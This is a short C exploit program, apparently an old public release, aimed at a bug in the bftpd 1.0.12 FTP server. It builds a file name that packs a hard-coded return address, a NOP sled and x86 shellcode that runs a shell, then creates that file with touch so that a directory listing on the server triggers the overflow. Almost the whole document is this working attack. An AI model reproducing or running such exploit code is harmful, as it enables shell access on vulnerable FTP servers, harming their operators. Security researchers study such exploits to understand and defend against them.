/*
Creates a filname to exploit the bug in bftpd 1.0.12
Create the file, cwd in the shell directory and nlist the file directory
(sh is executed in the working dir because it is not possible to insert a / in
the filename)

hints by |CyRaX| & Cthulhu
coded by asynchro

www.pkcrew.org
*/

#include <stdlib.h>
#include <unistd.h>

#define BUFSIZE 512
#define NOP 124

main()
{
int i;
char *buff;
char nop=0x90;
char addr[]="\xd4\xf9\xff\xbf";
char command[]="touch %.260x";
char shellcode[]=

"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xffsh";


buff=(char *) malloc(BUFSIZE);
memset(buff,0x0,BUFSIZE);
memcpy(buff,command,sizeof(command));

strncat(buff,addr,4);
strncat(buff,addr,4);

for(i=0; i < NOP ;i++)
{
strncat(buff,&nop,1);
}

strncat(buff,shellcode,strlen(shellcode));
system(buff);
}